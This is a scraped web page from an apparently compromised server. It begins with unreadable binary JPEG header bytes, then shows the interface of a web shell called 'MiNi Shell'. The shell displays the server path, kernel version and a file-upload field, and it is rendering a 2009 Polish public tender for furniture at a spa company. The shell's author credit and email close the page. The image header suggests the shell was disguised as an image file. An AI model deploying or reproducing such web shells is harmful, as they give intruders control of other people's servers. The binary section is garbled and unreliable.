JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090826/140551-N-2009.html

<p class="kh_header"><b>Lądek-Zdrój: Dostawa i montaż mebli dla Uzdrowiska Lądek-Długopole SA.</b><br>
<b>Numer ogłoszenia: 140551 - 2009; data zamieszczenia: 26.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Lądek Długopole S.A. , ul. Wolności 4, 57-540 Lądek-Zdrój, woj. dolnośląskie, tel. 074 8146434, 8146227 w. 265, faks 074 8147107.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna Skarbu Państwa - NZOZ..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli dla Uzdrowiska Lądek-Długopole SA..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest  dostawa i montaż mebli dla Uzdrowiska Lądek -    Długopole SA w Lądku Zdroju i Długopolu Zdroju. 
Zamówienie polega na dostawie i montażu mebli  do gabinetów zabiegowych, lekarskich, dyżurek pielęgniarskich i pomieszczeń biurowych w Lądku Zdroju oraz do Szpitala Uzdrowiskowego w Długopolu Zdroju.
Szczegółowy opis przedmiotu zamówienia i wykaz ilościowy mebli znajduje się w formularzach cenowych do części 1, 2 , 3 i 4  - wg  załączników nr 1a, 1b,  1c i 1d do SIWZ.


Część 1 - zał. Nr 1 a -
 1.Szafka kuchenna 3-szufladowa - 8 szt,
 2.Szafka kuchenna z drzwiami - 4 szt,
 3.Szafka wisząca - 4 szt,
 4.Blat o wymiarach - 4 szt,
 5.Blat o wymiarach - 4 szt,
 6.Stolik w kolorze olcha miodowa - 8 szt,
 7.Biurko na nóżkach metalowych - 8 szt,
 8.Szafa dwukomorowa - 4 szt,
 9.Szafka stojąca - 4 szt,
10.Szafka meblowa z drzwiczkami - 8 szt,
11.Szafka meblowa - 8 szt,
12.Szafka narożnik zewnętrzny - 4 szt,
13.Szafka meblowa - 4 szt,
14.Krzesło obrotowe biurowe - 8 szt,
15.Podnóżek - 5 szt,
16.Szafa dwudrzwiowa - 1 szt,
17.Szafa dwudrzwiowa z wnęką - 1 szt,
18.Biurko pod komputer - 1 szt,
19.Krzesło obrotowe - 3 szt,
20.Krzesło obrotowe  - 7 szt,
21.Szafa dwudrzwiowa - 1 szt,
22.Szafa dwudrzwiowa z nadstawką - 1 szt,
23.Komoda 4 szufladowa - 1 szt,
24.Łóżka - 2 szt,
25.Szafka nocna - 2 szt,
26.Lustro w drewnianej ramie - 1 szt,
27.Wieszak drewniany - 1 szt,
28.Krzesło drewniane - 2 szt,
29.Stolik drewniany - 1 szt.
Część 2 - zał. Nr 1b - 
 1. Szafa - 2 szt,
 2. Szafa - 1 szt,
 3.Szafka - 1 szt,
 4.Biurko narożne - 1 szt,
 5.Kontener po biurko - 1 szt,
 6.Wózek na PC na kółkach - 1 szt,
 7.Szafa dwudrzwiowa - 1 szt,
 8.Fotel obrotowy - 2 szt,
 9.Krzesło o konstrukcji metalowej - 2 szt,
10.Biurko w kształcie litery L - 1 szt,
11.Regał biblioteczny - 2 szt, 
12.Regał biblioteczny - 1 szt,
13.Krzesła tapicerowane - 2 szt,
14.Krzesło obrotowe - 1szt,
15.Stolik okrągły lub kwadratowy - 1 szt,
16.Szafka kuchenna
17.Szafka kuchenna - 1 szt,
18.Szafka kuchenna - 1 szt,
19.Szafka kuchenna - 1 szt,
20.Szafka kuchenna - 1 szt,
21.Blat do mebli kuchennych - 1 szt,
22.Sofa dwuosobowa - 10 szt,
23.Fotel jednoosobowy - 4 szt,
24.Ława - 5 szt,
25.Łóżko - 6 szt,
26.Szafka nocna - 6 szt.
Część 3 - zał. Nr 1c  -
1. Krzesło obrotowe - 2 szt,
2. Biurko - 1 szt.


Część 4 - zał. Nr 1d - 
1. Komoda - 8 szt,
2. Wieszak - 7 szt,
3. Stolik okolicznościowy - 1 szt,
4. Szafa dwudrzwiowa - 1 szt,
5. Nadstawka dwudrzwiowa - 1 szt.

Zakres zamówienia zawiera się w przedziale poniżej progów ustalonych na podstawie art.11 ust. 8 Ustawy Pzp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2, 39.14.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się  Wykonawcy , którzy;
 -   nie podlegają wykluczeniu na podstawie art. 24 Ustawy Pzp z dnia 29 stycznia 2004r. z póź. zmianami,
 -   spełniają warunki określone w art. 22 ust.1,
 -   zaoferują :
 a)  wykonanie zamówienia w terminie do 2 miesięcy od dnia podpisania umowy,
 b)  zaakceptują  14 - dniowy termin płatności licząc od dnia złożonej faktury VAT (wraz z kompletem dokumentów - dokument WZ podpisany przez kierownika danego obiektu lub osobę upoważnioną przez niego lub przez zarząd spółki) wystawionej przy każdej dostawie po jej odbiorze, 
c)  przedłożą wymagane przez Zamawiającego dokumenty.

 Ocena spełnienia warunków udziału polegać będzie na kontroli autentyczności oraz kompletności i aktualności złożonych dokumentów, autentyczności  zawartych w nich informacji  oraz ocenie zawartych w dokumentach informacji pod kątem zgodności  z postawionymi warunkami w SIWZ - wszystko na zasadzie formuły :
Spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu  powinien złożyć następujące dokumenty:
1) Wypełniony i podpisany formularz ofertowy - zgodnie z zał. nr 1,
2) Wypełniony i podpisany formularz cenowy lub formularze cenowe (jeżeli składane są oferty na więcej niż jedną część zamówienia) - zał. Nr  1a i/lub 1b, i/lub 1c, i/lub 1d.
3) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
4) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt nie  wynika z  przedstawionych dokumentów rejestrowych.    
5) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 Prawa zamówień publicznych - zał. nr 2,
6) Zaakceptowany( zaparafowany) projekt umowy - zał. nr 3,
7) Oświadczenie o nie zaleganiu z opłatami do ZUS i Urzędu  Skarbowego, finansowe i o  niekaralności -       zał. nr 4,
8) Katalogi lub fotografie ( koniecznie kolorowe) proponowanych mebli oraz próbki materiałów obiciowych i okleinowych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-ladek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Lądek-Długopole SA, 57-540 Lądek Zdrój, ul. Wolności 4, pok. nr 204 
(Zamówienia Publiczne) II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2009 godzina 10:00, miejsce: Uzdrowisko Lądek-Długopole SA, 57-540 Lądek Zdrój, ul. Wolności 4, pok. nr 105 
(Sekretariat), I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com